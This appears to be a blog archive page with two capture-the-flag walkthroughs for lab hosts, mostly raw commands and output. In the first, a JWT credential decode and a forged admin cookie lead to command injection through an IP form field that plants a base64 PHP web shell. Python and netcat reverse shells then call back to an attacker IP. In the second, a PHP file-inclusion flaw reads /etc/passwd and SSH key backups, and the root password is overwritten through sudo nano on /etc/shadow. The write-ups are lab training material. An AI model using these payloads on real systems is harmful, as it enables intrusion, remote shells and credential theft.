Month: February 2021
Protected: pg-nickel-private
Protected: ptd-kingschultz-private
Protected: ptd-fullmounty-private
Protected: htb-ophiuchi-nl
ptd-Merry-Go-Round
E:\PENTEST\NMAP>
nmap -p- 10.150.150.100
Starting Nmap 7.70 ( https://nmap.org ) at 2021-02-19 15:38 W. Europe Standard Time Stats: 0:00:28 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan SYN Stealth Scan Timing: About 72.50% done; ETC: 15:38 (0:00:05 remaining) Nmap scan report for 10.150.150.100 Host is up (0.030s latency). Not shown: 65522 closed ports PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 5000/tcp open upnp 8131/tcp open indigo-vbcp 8148/tcp open isdd 8154/tcp open unknown 8169/tcp open unknown 8214/tcp open unknown 8422/tcp open unknown 8600/tcp open asterix 8795/tcp open unknown 8971/tcp open unknown 8984/tcp open unknown Nmap done: 1 IP address (1 host up) scanned in 34.23 seconds E:\PENTEST\NMAP>
curl http://10.150.150.100:8131
>> eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyIjoiaXRzbWUiLCJwYXNzIjoiMmMxN2M2MzkzNzcxZWUzMDQ4YWUzNGQ2YjM4MGM1ZWMifQ.7mndOl98wTtLrPLZN_69UwY4e2sY_lmy_3tSiF3bTkU curl: (56) Recv failure: Connection was reset E:\PENTEST\NMAP>curl http://10.150.150.100:8148 curl: (56) Recv failure: Connection was reset E:\PENTEST\NMAP>curl http://10.150.150.100:8148 curl: (56) Recv failure: Connection was reset E:\PENTEST\NMAP>curl http://10.150.150.100:8148 curl: (56) Recv failure: Connection was reset E:\PENTEST\NMAP>curl http://10.150.150.100:8148 curl: (56) Recv failure: Connection was reset E:\PENTEST\NMAP>curl http://10.150.150.100:8148 curl: (56) Recv failure: Connection was reset E:\PENTEST\NMAP>
curl http://10.150.150.100:8148/
>> eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyIjoicmljaGFyZCIsInBhc3MiOiI3NzY4NjE3NDZFNkY3NCJ9.e_FDTScd6anuQyWH7sCetjCqjTjvsi_9Sk5d1-vcU_4 curl: (56) Recv failure: Connection was reset E:\PENTEST\NMAP>
curl http://10.150.150.100:8154/
>> eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyIjoibG9va2hlcmUiLCJwYXNzIjoiZjUyY2FlN2Q2NzdmZDhhODNhYzdjYzQ0MDZjMWQwNzNhNjlhN2IyMyJ9.V1ERq4lFaEr_U9vdE1n43uq-cP5zS8EKaRJKfvhaOjY curl: (56) Recv failure: Connection was reset E:\PENTEST\NMAP>curl http://10.150.150.100:8169 >> eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyIjoiYWRtaW5pc3RyYXRvciIsInBhc3MiOiJqdXBpdGVyIn0.4dA5aV12WciBnX_53pR_Zs0q1FdCwqMBjaRvWMKJlB8 curl: (56) Recv failure: Connection was reset E:\PENTEST\NMAP>curl http://10.150.150.100:8214/ curl: (56) Recv failure: Connection was reset E:\PENTEST\NMAP>
curl http://10.150.150.100:8214/
>> eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyIjoiaG9uZXkiLCJwYXNzIjoiMzdjNjA3MTE5OWZjMGQ1NGM3ODA0ZjRlZTY3ZTBiZTFmZjQ5MGUwOWE3MzE2ZWIyMDJmODE4ZDcwOTk1MjU3MGYzMGVmYjE1ZjMwMGQ1ZTYwNmMxZjAxMjdlMTNiMTkwODU0Y2UyMjFkNjllYjg3OTBhZjI4YTQ0NjNmYTZiODEifQ.B7oIwzKMDvqASNqGMeCF65oD8JARDh1rGrR26j6QQE4 curl: (56) Recv failure: Connection was reset E:\PENTEST\NMAP>
curl http://10.150.150.100:8422/
>> eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyIjoibG9va2hlcmUiLCJwYXNzIjoiYTk0YThmZTVjY2IxOWJhNjFjNGMwODczZDM5MWU5ODc5ODJmYmJkMyJ9.5fM1qeavBWXL2_DzbpJD9pPAHsuoKaH6h4WLGEKPCtg curl: (56) Recv failure: Connection was reset E:\PENTEST\NMAP>curl http://10.150.150.100:8600/ curl: (56) Recv failure: Connection was reset E:\PENTEST\NMAP>curl http://10.150.150.100:8600/ curl: (56) Recv failure: Connection was reset E:\PENTEST\NMAP>
curl http://10.150.150.100:8600/
>> eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyIjoiYWRtaW5pc3RyYXRvciIsInBhc3MiOiJiYW5hbmEifQ.7jqCMA8wLvqFf_B_K7xLpJ6HFHUFBtYZjZgKbL__Euk E:\PENTEST\NMAP>curl http://10.150.150.100:8795/ curl: (56) Recv failure: Connection was reset E:\PENTEST\NMAP>curl http://10.150.150.100:8795/ curl: (56) Recv failure: Connection was reset E:\PENTEST\NMAP>
curl http://10.150.150.100:8795/
>> eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyIjoiam9obiIsInBhc3MiOiJVRTlxZG5JNFVrcDNlSGQxYWt0VFpRbz0ifQ.KnkALx296Nb4Y-2JzTvbK2IedamG7gp_TpKb36WFqhI curl: (56) Recv failure: Connection was reset E:\PENTEST\NMAP>
.
{"typ":"JWT","alg":"HS256"}.{"user":"richard","pass":"776861746E6F74"}.e_
{"typ":"JWT","alg":"HS256"}.{"user":"administrator","pass":"jupiterIn0.áÐ9i]vYÈ
{"typ":"JWT","alg":"HS256"}.{"user":"honey","pass":"37c6071199fc0d54c7804f4ee67e0be1ff490e09a7316eb202f818d709952570f30efb15f300d5e606c1f0127e13b190854ce221d69eb8790af28a4463fa6b81"
{"typ":"JWT","alg":"HS256"}.{"user":"administrator","pass":"banana"fQ.î:
{"typ":"JWT","alg":"HS256"}.{"user":"john","pass":"UE9qdnI4Ukp3eHd1aktTZQo="fQ.*y
=> nog een keer decode => POjvr8RJwxwujKSe
=> login
john / POjvr8RJwxwujKSe
gives FLAG73=26ABDA36DFAE4CBA32ADB2DD5B53EFCFC60875C4
http://10.150.150.100:5000/landing
view-source:http://10.150.150.100:5000/static/door-lib-version1.2.min.js
puckiestyle, [22.02.21 13:37]
hoi Jonne, ik heb het java script [ http://10.150.150.100:5000/static/door-lib-version1.2.min.js ] bekeken met een beautifier , wel gevonden sha256("username:user") & sha256("username:admin") op console.log , maar geen idee hoe dit toe te passen,
Jonne, [22.02.21 13:39]
Je kunt een cookie maken met sha256("john:admin")
Jonne, [22.02.21 13:39]
curl -i --cookie "role=b7ea426b84a5a44ddeabcd2cdc0f6e42a4fd65be4756beeb5ebeb5cc73c23c06" 'http://10.150.150.100:5000/landing'
Jonne, [22.02.21 13:41]
<h1> Welcome Admin! </h1>
<!-- Open sesame! -->
.
curl -i --cookie "role=b7ea426b84a5a44ddeabcd2cdc0f6e42a4fd65be4756beeb5ebeb5cc73c23c06" 'http://10.150.150.100:5000/landing'
</html>┌─[user@parrot-virtual]─[~/ptd]
└──╼ $curl -i --cookie "role=b7ea426b84a5a44ddeabcd2cdc0f6e42a4fd65be4756beeb5ebeb5cc73c23c06" 'http://10.150.150.100:5000/landing'
HTTP/1.0 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 574
Server: Werkzeug/1.0.1 Python/3.6.9
Date: Mon, 22 Feb 2021 13:50:00 GMT
<!DOCTYPE html>
<html>
<head>
<title>Index</title>
</head>
<body>
<p>FLAG74=BCE09F9895DED436359E935D0F77B1CDAE3CBC02</p></br>
<h1> Welcome Admin! </h1>
<!-- Open sesame! -->
<form action="/landing" method="post">
<div class="container">
<label for="target"><b>IP</b></label>
<input type="text" placeholder="Enter IP Address" name="target" autocomplete="off" required>
<button type="submit">Check</button>
</br>
<h3> Connectivity Result: </h3></br>
</div>
<div class="container" style="background-color:#f1f1f1">
</div>
</form>
</body>
</html>┌─[user@parrot-virtual]─[~/ptd]
└──╼ $
rm -f /tmp/p; mknod /tmp/p p && nc 10.66.66.42 4444 0/tmp/p
curl -i –cookie “role=b7ea426b84a5a44ddeabcd2cdc0f6e42a4fd65be4756beeb5ebeb5cc73c23c06” ‘http://10.150.150.100:5000/landing’ -d ‘target=10.66.66.18; echo “PD9waHAKICAgIGlmKGlzc2V0KCRfR0VUWydjbWQnXSkpCiAgICB7CiAgICAgICAgc3lzdGVtKCRfR0VUWydjbWQnXSk7CiAgICB9CgoK” | base64 -d > /var/www/html/shell.php’
http://10.150.150.100/shell.php?cmd=whoami
python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“10.66.66.42”,80));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/bin/sh”,”-i”]);’
┌─[user@parrot-virtual]─[~/ptd/merry-go-round] └──╼ $
sudo nc -nlvp 80
[sudo] password for user: listening on [any] 80 ... connect to [10.66.66.42] from (UNKNOWN) [10.150.150.100] 46010 /bin/sh: 0: can't access tty; job control turned off $ id uid=1000(happy) gid=1000(happy) groups=1000(happy),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lxd) $
whoami
happy $
sudo /bin/sh
cat flag75.txt FLAG75=384FA60682220A6AAA314E6A03059215D34A2225 cat flag76.txt FLAG76=342E17655889D42D4B90E3985BFFB53E6D2EE36F
.
Author : Puckiestyle
Protected: pg-algernon-private
Protected: pg-billyboss-private
ptd-silence-private
..
┌─[user@parrot-virtual]─[~/ptd/10.150.150.55] └──╼ $cat allports.nmap # Nmap 7.91 scan initiated Wed Feb 17 08:03:40 2021 as: nmap -A -oN allports.nmap 10.150.150.55 Nmap scan report for 10.150.150.55 Host is up (0.032s latency). Not shown: 995 closed ports PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd | ftp-anon: Anonymous FTP login allowed (FTP code 230) |_-rw-r--r-- 1 0 0 13 Jun 12 2020 test | ftp-syst: | STAT: | FTP server status: | Connected to ::ffff:10.66.66.42 | Logged in as ftp | TYPE: ASCII | No session bandwidth limit | Session timeout in seconds is 300 | Control connection is plain text | Data connections will be plain text | At session startup, client count was 3 | vsFTPd 3.0.3 - secure, fast, stable |_End of status 80/tcp open http Apache httpd 2.4.41 ((Ubuntu)) |_http-server-header: Apache/2.4.41 (Ubuntu) |_http-title: Apache2 Ubuntu Default Page: It works 139/tcp open netbios-ssn Samba smbd 4.6.2 445/tcp open netbios-ssn Samba smbd 4.6.2 1055/tcp open ssh OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0) Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel Host script results: |_clock-skew: 53m37s |_nbstat: NetBIOS name: UBUNTU, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown) | smb2-security-mode: | 2.02: |_ Message signing enabled but not required | smb2-time: | date: 2021-02-17T08:57:32 |_ start_date: N/A Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Wed Feb 17 08:03:55 2021 -- 1 IP address (1 host up) scanned in 14.70 seconds ┌─[user@parrot-virtual]─[~/ptd/10.150.150.55]
.
┌─[✗]─[user@parrot-virtual]─[~/ptd/10.150.150.55] └──╼ $dirb http://10.150.150.55 /usr/share/wordlists/10k-most-common.txt -X .php ----------------- DIRB v2.22 By The Dark Raver ----------------- START_TIME: Thu Feb 18 08:27:26 2021 URL_BASE: http://10.150.150.55/ WORDLIST_FILES: /usr/share/wordlists/10k-most-common.txt EXTENSIONS_LIST: (.php) | (.php) [NUM = 1] ----------------- GENERATED WORDS: 10000 ---- Scanning URL: http://10.150.150.55/ ---- + http://10.150.150.55/trick.php (CODE:200|SIZE:0) + http://10.150.150.55/info.php (CODE:200|SIZE:70050) + http://10.150.150.55/??????.php (CODE:200|SIZE:10918) + http://10.150.150.55/?????.php (CODE:200|SIZE:10918) ----------------- END_TIME: Thu Feb 18 08:32:58 2021 DOWNLOADED: 10000 - FOUND: 4 ┌─[user@parrot-virtual]─[~/ptd/10.150.150.55]
┌─[user@parrot-virtual]─[~/ptd/10.150.150.55] └──╼ $cat trick.php <?php include($_GET['page']); ?>
┌─[user@parrot-virtual]─[~/ptd/10.150.150.55]
└──╼ $curl -X POST –data “file=browser.php” 10.150.150.55/info.php
┌─[user@parrot-virtual]─[~/ptd/10.150.150.55] └──╼ $smbclient -L 10.150.150.55 -U "" -N Sharename Type Comment --------- ---- ------- print$ Disk Printer Drivers IPC$ IPC IPC Service (ubuntu server (Samba, Ubuntu)) SMB1 disabled -- no workgroup available
trick.php?page=index.html
curl 'http://10.150.150.55/trick.php?page=php://filter/convert.base64-encode/resource=index.php' | base64 -d > index.php
En in die source vind je dan:
index.php?path=/
=> http://10.150.150.55/index.php?path=/
http://10.150.150.55/index.php?path=/home/sally/backup/SSHArchiveBackup.tar.gz
curl ‘http://10.150.150.55/trick.php?page=php://filter/convert.base64-encode/resource=/home/sally/backup/SSHArchiveBackup.tar.gz’ | base64 -d > home/sally/backup/SSHArchiveBackup.tar.gz
┌─[user@parrot-virtual]─[~/ptd/10.150.150.55] └──╼ $ls -la total 256 drwxr-xr-x 1 user user 138 Feb 17 10:55 . drwxr-xr-x 1 user user 2034 Feb 17 08:02 .. -rw-r--r-- 1 user user 1617 Feb 17 08:03 allports.nmap -rw-r--r-- 1 user user 56184 Feb 17 10:45 browser.php -rw-r--r-- 1 user user 6 Feb 17 08:05 hallo.txt -rw-r--r-- 1 user user 4694 Feb 17 10:24 index.php -rw-r--r-- 1 user user 183770 Feb 17 10:55 SSHArchiveBackup.tar.gz -rw-r--r-- 1 user user 13 Feb 17 08:06 test ┌─[user@parrot-virtual]─[~/ptd/10.150.150.55] └──╼ $curl 'http://10.150.150.55/trick.php?page=php://filter/convert.base64-encode/resource=/home/sally/backup/SSHArchiveBackup.tar.gz' | base64 -d > SSHArchiveBackup.tar.gz
┌─[user@parrot-virtual]─[~/ptd/10.150.150.55] └──╼ $curl 'http://10.150.150.55/trick.php?page=php://filter/convert.base64-encode/resource=/etc/passwd' | base64 -d > passwd % Total % Received % Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed 0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 100 4128 100 4128 0 0 58971 0 --:--:-- --:--:-- --:--:-- 58971 ┌─[user@parrot-virtual]─[~/ptd/10.150.150.55] └──╼ $cat passwd root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin --snip-- sshd:x:126:65534::/run/sshd:/usr/sbin/nologin gary:x:1001:1001::/home/gary:/bin/sh john:x:1002:1002::/home/john:/bin/sh sally:x:1003:1003::/home/sally:/bin/sh alice:x:1004:1004::/home/alice:/bin/sh ftp:x:127:133:ftp daemon,,,:/srv/ftp/home/:/usr/sbin/nologin ftpuser:x:1005:1005::/home/ftpuser:/bin/sh Debian-snmp:x:128:136::/var/lib/snmp:/bin/false ┌─[user@parrot-virtual]─[~/ptd/10.150.150.55]
┌─[user@parrot-virtual]─[~/ptd/10.150.150.55] └──╼ $curl 'http://10.150.150.55/trick.php?page=php://filter/convert.base64-encode/resource=/home/alice/myFile.txt' | base64 -d > myFile.txt
for key in id_rsa*; do echo $key; ssh -p 1055 -o "PreferredAuthentications=publickey" alice@10.150.150.55 -i $key; done En dan zelfde voor andere users (gary, sally en alice) for key in id_rsa*; do echo $key; ssh -p 1055 -o "PreferredAuthentications=publickey" john@10.150.150.55 -i $key; done
curl ‘http://10.150.150.55/trick.php?page=php://filter/convert.base64-encode/resource=/home/john/FLAG79.txt’ | base64 -d > FLAG79.txt
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC9I2y+p4cBMuaydINICFfYW7EFhDJA0DaLxokCz5UutruL+oNA2oJmeAqdK1CaHyfQd56TSnzCruadO3mOCjzCLBuxDxYTJxsOpOaaJP/fUfFrUG2A1rqQzxXYy6ylQEJzyN+bdO5U3C7HpY7W5LMRZls8bw8YhO+PMZVS7Nv6z/+iDbqk56RyG2yDcb8aJDX3WTv0jTMbNRCUfn2dZzoXymGbZcKpUd2ep4u+G4wHOceDHxAAB2bPZYIJcEsTsmDjtKueJCb9deOOWtZ/Y9ZLmnA807KiHhbAquiWTazNNFiFrKQv0/aJpW9q19ZYRE1GUz6WNLcYFJsbBzLWmjTXMoHIBtNVnd0KuRYKubRNcENNIg2IebCdV5NcYuzE8+AUGyIR8EAmZ4s8XCWMk/yj1kPep+PcyHMj+QaP6kn3i1ub2As39K6WB6txDo4CzIv3EFWprtRX3o43/ItSLVmhTK2QVfgEcefAyCV52b8LKvjPJ0QZB1Ka2L5ogagc9XU= root@parrot-virtual" > authorized_keys
┌─[✗]─[user@parrot-virtual]─[~/ptd/10.150.150.55]
└──╼ $sudo ssh -i id_rsa john@10.150.150.55 -p 1055
Silence Please
Last login: Sat Jul 4 02:27:27 2020 from 10.210.210.55
$ id
uid=1002(john) gid=1002(john) groups=1002(john),1006(netAdmin)
$ cat FLAG79.txt
3ca569f9d5bc771b0457c4f4d42d29c4824e8d70
$ sudo -l
Matching Defaults entries for john on ubuntu:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
logfile=/var/log/sudo.log
User john may run the following commands on ubuntu:
(ALL) NOPASSWD: /usr/bin/nano
$ pwd
/home/john/.ssh
$ openssl passwd -6 -salt xyz yourpass
$6$xyz$VKswtvLoVpOLcpjDMIFXhxa8ukqqKSKHjcPBLZUk9NxWldmlFQY4stUGo.QjEhav7mp86ih2PRqYPqjkhWi5y.
$
$ nano /etc/shadow
$ id
uid=1002(john) gid=1002(john) groups=1002(john),1006(netAdmin)
$ sudo nano /etc/shadow
$ su root
Password:
root@ubuntu:/home/john# cd /root
root@ubuntu:~# ls
FLAG80.txt hiddenFile snap
root@ubuntu:~# cat FLAG80.txt
75a60cd346351234ecb8348d7c1da94dac75fc4c
root@ubuntu:~#
root@ubuntu:~# cat /etc/shadow | grep root
root:$6$xyz$VKswtvLoVpOLcpjDMIFXhxa8ukqqKSKHjcPBLZUk9NxWldmlFQY4stUGo.QjEhav7mp86ih2PRqYPqjkhWi5y.:18501:0:99999:7:::
root@ubuntu:~#
Author : Puckiestyle